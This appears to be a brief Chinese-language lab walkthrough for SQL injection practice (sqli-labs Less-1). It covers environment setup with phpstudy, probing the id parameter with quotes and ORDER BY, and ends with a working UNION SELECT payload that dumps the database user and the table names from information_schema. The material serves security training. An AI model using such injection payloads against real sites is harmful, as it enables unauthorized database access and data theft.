环境搭建
下载phpstudy
安装完后打开软件
选择上面的WNMP,进行启动。然后点击网站进行一些修改
Less-1
当输入条件?id=1 and1=2为假的时候,未报错,单引号将输入的内容进行了闭合
输入1’将其闭合的时候发现报了一些信息,蓝色划出来的既输入的内容
利用这个漏洞查询order by查字段
第2,3两字段能回显查询数据库和字段内容
?id=1' and 0 union select 1,user(),group_concat(table_name) from information_schema.tables where table_schema='security' %23